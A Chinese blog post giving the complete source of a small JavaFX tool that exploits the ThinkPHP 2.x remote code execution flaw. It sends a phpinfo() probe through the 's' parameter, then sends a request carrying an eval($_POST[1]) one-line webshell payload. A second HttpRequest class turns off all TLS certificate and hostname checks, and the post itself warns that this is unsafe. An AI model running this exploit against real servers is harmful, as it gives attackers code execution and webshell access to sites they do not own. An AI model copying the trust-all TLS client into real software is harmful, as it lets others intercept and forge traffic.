Javafx之一个小demo

一个小demo

懒得讲了,直接看代码吧

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<!-- Maven build for the demo: one module, compiled for Java 8, with OkHttp as its only declared dependency. -->
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>Gui_demo</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <!-- Source and bytecode level are both Java 8. -->
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>


    <!-- NOTE(review): no JavaFX artifact is declared, so the javafx.* imports in GuiDemo.java presumably
         resolve from a JDK 8 distribution that bundles JavaFX; confirm for the JDK actually used. -->
    <dependencies>
        <!-- HTTP client used by HttpRequest.java; the version is pinned to one exact release. -->
        <dependency>
            <groupId>com.squareup.okhttp3</groupId>
            <artifactId>okhttp</artifactId>
            <version>4.9.3</version>
        </dependency>


    </dependencies>
</project>
HttpRequest.java
//这个可以直接拿来用
import java.io.IOException;

import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;

/**
 * Minimal blocking HTTP helper built on OkHttp.
 *
 * <p>Each call sends a single request and hands back the response body as text. The HTTP status
 * code is never inspected, so an error page is returned to the caller like any other body.
 */
public class HttpRequest {
    /** Media type attached to bodies sent by {@link #post(String, String)}. */
    public static final MediaType JSON = MediaType.parse("application/json; charset=utf-8");

    // Default OkHttp client (platform trust store, standard hostname verification), one per instance.
    OkHttpClient client = new OkHttpClient();

    /**
     * Issues a GET request.
     *
     * @param url absolute URL to fetch
     * @return the response body decoded as a string
     * @throws IOException if the call cannot be executed or the body cannot be read
     */
    public String get(String url) throws IOException {
        Request.Builder builder = new Request.Builder();
        builder.url(url);
        return send(builder.build());
    }

    /**
     * Issues a POST request carrying {@code json} with the {@link #JSON} media type.
     *
     * @param url  absolute URL to post to
     * @param json request body text
     * @return the response body decoded as a string
     * @throws IOException if the call cannot be executed or the body cannot be read
     */
    public String post(String url, String json) throws IOException {
        RequestBody payload = RequestBody.create(JSON, json);
        Request.Builder builder = new Request.Builder();
        builder.url(url);
        builder.post(payload);
        return send(builder.build());
    }

    /** Executes {@code request} synchronously and reads the whole body into memory. */
    private String send(Request request) throws IOException {
        // string() already closes the body once it is read; the try block only makes that explicit.
        try (Response reply = client.newCall(request).execute()) {
            return reply.body().string();
        }
    }
}
Thinkphp.java

import java.io.IOException;

/**
 * Request helpers for the ThinkPHP check that the GUI on this page drives.
 *
 * <p>Both methods append a fixed path to {@code target} verbatim, so {@code target} must be a
 * complete base URL that already ends in {@code /}.
 */
public class Thinkphp {

    // Log/WAF relevance: both paths below place a "${@" expression (sent raw, or with the braces
    // encoded as %7B / %7D) inside the "s" query parameter, so access logs and request filters can
    // match on that sequence to find these requests.

    /**
     * Sends the phpinfo() probe and returns whatever the server answered.
     *
     * <p>The caller decides whether the target is affected by looking for phpinfo() output in the
     * returned text; this method does not interpret the body or the status code.
     *
     * @param target base URL ending in {@code /}
     * @return the raw response body
     * @throws IOException if the request cannot be completed
     */
    public static String run(String target) throws IOException {
        HttpRequest http = new HttpRequest();
        return http.get(target + "index.php?s=/index/index/name/$%7B@phpinfo()%7D");
    }

    /**
     * Requests the second URL once and returns that URL to the caller.
     *
     * <p>NOTE(review): the response is discarded, and nothing in this request appears to store
     * anything on the server; the returned URL would only keep working while the routing flaw
     * itself is unpatched, so remediation is the framework fix rather than a file clean-up.
     *
     * @param target base URL ending in {@code /}
     * @return the URL that was requested
     * @throws IOException if the request cannot be completed
     */
    public static String shell(String target) throws IOException {
        final String shl = target + "index.php?s=/index/index/name/${@print(eval($_POST[1]))}";
        new HttpRequest().get(shl);
        return shl;
    }

}

GuiDemo.java

import javafx.application.Application;
import javafx.event.ActionEvent;
import javafx.event.EventHandler;
import javafx.scene.Scene;
import javafx.scene.control.*;
import javafx.scene.layout.AnchorPane;
import javafx.stage.Stage;

import java.io.IOException;

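/**
 * JavaFX window for the ThinkPHP 2.x check: one target field, two buttons and a result area.
 *
 * <p>Compared with a bare "marker found" check, every click now ends with a message in the result
 * area: a negative result and an unusable target string are both reported instead of leaving the
 * previous text on screen.
 */
public class GuiDemo extends Application {

    /** Text that phpinfo() output contains; seeing it means the probe expression was executed. */
    private static final String PHPINFO_MARKER = "PHP Version";

    @Override
    public void start(Stage primaryStage) throws Exception {
        // Prompt label
        Label label = new Label("请输入目标");
        label.setLayoutX(5);
        label.setLayoutY(10);
        label.setPrefWidth(70);
        label.setPrefHeight(20);

        // Target input box (x, y, width, height)
        TextArea textArea = new TextArea();
        textArea.setLayoutX(75);
        textArea.setLayoutY(5);
        textArea.setPrefWidth(220);
        textArea.setPrefHeight(20);
        textArea.setText("请输入目标ip或者域名......");

        // "Verify" button
        Button button = new Button("验证");
        button.setLayoutX(310);
        button.setLayoutY(10);
        button.setPrefHeight(20);
        button.setPrefWidth(50);

        // Second-stage button
        Button button1 = new Button("写入一句话木马");
        button1.setLayoutX(370);
        button1.setLayoutY(10);
        button1.setPrefHeight(20);
        button1.setPrefWidth(100);

        // Result area (x, y, width, height), wrapped so long URLs stay visible
        TextArea textArea1 = new TextArea();
        textArea1.setLayoutX(5);
        textArea1.setLayoutY(50);
        textArea1.setPrefWidth(500);
        textArea1.setPrefHeight(300);
        textArea1.setWrapText(true);

        // NOTE(review): both handlers perform the HTTP call on the JavaFX Application Thread, so the
        // window does not repaint until the request returns or times out.

        // Verify: run the probe and always report an outcome.
        button.setOnAction(event -> {
            String url = textArea.getText();
            try {
                if (isVulnerable(url)) {
                    textArea1.setText("存在此漏洞");
                } else {
                    // Previously nothing was shown here, so a stale "vulnerable" result could remain.
                    textArea1.setText("未检测到此漏洞");
                }
            } catch (IOException e) {
                textArea1.setText("不存在此漏洞或者网络异常!!!");
            } catch (IllegalArgumentException e) {
                // OkHttp rejects strings that are not http/https URLs (e.g. the placeholder text).
                textArea1.setText("目标地址无效,请输入完整的 URL,例如 http://host/");
            }
        });

        // Second stage: only proceeds when the probe confirmed the issue, then shows the returned URL.
        button1.setOnAction(event -> {
            String url = textArea.getText();
            try {
                if (isVulnerable(url)) {
                    textArea1.setText("一句话木马是:\n" + Thinkphp.shell(url));
                } else {
                    textArea1.setText("未检测到此漏洞");
                }
            } catch (IOException e) {
                textArea1.setText("不存在此漏洞或者网络异常!!!");
            } catch (IllegalArgumentException e) {
                textArea1.setText("目标地址无效,请输入完整的 URL,例如 http://host/");
            }
        });

        // Layout
        AnchorPane pane1 = new AnchorPane();
        pane1.getChildren().addAll(label, button, button1, textArea, textArea1);
        // Scene
        Scene scene1 = new Scene(pane1, 510, 400);
        // Main stage / window
        primaryStage.setTitle("ThinkPHP 2.x 任意代码执行漏洞 made by yz");
        primaryStage.setScene(scene1);
        primaryStage.show();
    }

    /**
     * Runs the probe against {@code url} and reports whether phpinfo() output came back.
     *
     * @param url base URL typed into the target field
     * @return {@code true} when the response contains {@link #PHPINFO_MARKER}
     * @throws IOException if the request cannot be completed
     */
    private static boolean isVulnerable(String url) throws IOException {
        String response = Thinkphp.run(url);
        return response.contains(PHPINFO_MARKER);
    }

    /**
     * Starts the JavaFX application.
     *
     * @param args command-line arguments handed to {@code launch}
     */
    public static void main(String[] args) {
        launch(args);
    }
}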
Main.java

/**
 * Plain launcher class that hands control to {@link GuiDemo}.
 */
public class Main {
    /**
     * Forwards the command-line arguments, unchanged, to {@code GuiDemo.main}.
     *
     * @param args command-line arguments
     */
    public static void main(String[] args) {
        // NOTE(review): presumably kept separate so the entry point is a class that does not
        // extend Application; the page does not say why. Confirm before merging it into GuiDemo.
        GuiDemo.main(args);
    }
}

在这里插入图片描述
在这里插入图片描述

虽然很简陋,但是基本功能是有了,其他的就是多加一些功能啥的,可以自由发挥。

特别要注意的是,考虑到目标网站可能是 https 网站,而且证书可能无法通过校验(例如自签名证书),那么可以把上面的 HttpRequest.java 文件换成以下代码。这段代码会完全跳过证书链和主机名校验,对端身份无法确认,响应内容也可能被中间人替换,所以检测结果只在可信的测试网络里才可靠:


import okhttp3.*;

import javax.net.ssl.*;
import java.io.IOException;

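/**
 * Blocking HTTP helper whose OkHttp client accepts any TLS certificate for any hostname.
 *
 * <p>Security: with validation switched off the peer is unauthenticated. Anyone on the network
 * path can read the requests and substitute the response, so a verdict derived from the body
 * (such as a marker-string check) can be forged. Where the target's CA or certificate is known,
 * trusting that specific certificate is the safer alternative to this class.
 */
public class HttpRequest {
    /** Media type attached to bodies sent by {@link #post(String, String)}. */
    public static final MediaType JSON = MediaType.parse("application/json; charset=utf-8");

    // Built once and shared: the previous code created a new SSLContext and a new client (with its
    // own connection pool and dispatcher) for every single request.
    private static final OkHttpClient SHARED_UNSAFE_CLIENT = getUnsafeOkHttpClient();

    /**
     * Builds a new client that performs no certificate-chain and no hostname validation.
     *
     * @return a client that will complete a TLS handshake with any server
     * @throws IllegalStateException if the TLS context cannot be created or initialised
     */
    public static OkHttpClient getUnsafeOkHttpClient() {
        // Empty check methods: no chain, expiry, issuer or revocation validation takes place.
        final X509TrustManager trustAll = new X509TrustManager() {
            @Override
            public void checkClientTrusted(java.security.cert.X509Certificate[] chain, String authType) {
            }

            @Override
            public void checkServerTrusted(java.security.cert.X509Certificate[] chain, String authType) {
            }

            @Override
            public java.security.cert.X509Certificate[] getAcceptedIssuers() {
                return new java.security.cert.X509Certificate[0];
            }
        };

        try {
            // "TLS" is the standard protocol name; the old "SSL" alias is kept only for legacy code.
            final SSLContext sslContext = SSLContext.getInstance("TLS");
            sslContext.init(null, new TrustManager[]{trustAll}, new java.security.SecureRandom());

            return new OkHttpClient.Builder()
                    // Two-argument overload: the single-argument form is deprecated because OkHttp
                    // then has to recover the trust manager reflectively, which newer JDKs refuse.
                    .sslSocketFactory(sslContext.getSocketFactory(), trustAll)
                    // Accepts every hostname, so a certificate issued for another host also passes.
                    .hostnameVerifier((hostname, session) -> true)
                    .build();
        } catch (java.security.GeneralSecurityException e) {
            throw new IllegalStateException("Unable to initialise the TLS context", e);
        }
    }

    /**
     * Issues a GET request over the shared unverified client.
     *
     * @param url absolute URL to fetch
     * @return the response body decoded as a string; the status code is not checked
     * @throws IOException if the call cannot be executed or the body cannot be read
     */
    public String get(String url) throws IOException {
        Request request = new Request.Builder()
                .url(url)
                .build();
        return send(request);
    }

    /**
     * Issues a POST request carrying {@code json} over the shared unverified client.
     *
     * @param url  absolute URL to post to
     * @param json request body text, sent with the {@link #JSON} media type
     * @return the response body decoded as a string; the status code is not checked
     * @throws IOException if the call cannot be executed or the body cannot be read
     */
    public String post(String url, String json) throws IOException {
        RequestBody body = RequestBody.create(JSON, json);
        Request request = new Request.Builder()
                .url(url)
                .post(body)
                .build();
        return send(request);
    }

    /** Executes {@code request} synchronously and releases the response once the body is read. */
    private static String send(Request request) throws IOException {
        try (Response response = SHARED_UNSAFE_CLIENT.newCall(request).execute()) {
            return response.body().string();
        }
    }
}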

参考

JAVA-GUI 工具的编写-----事件篇 (qq.com)
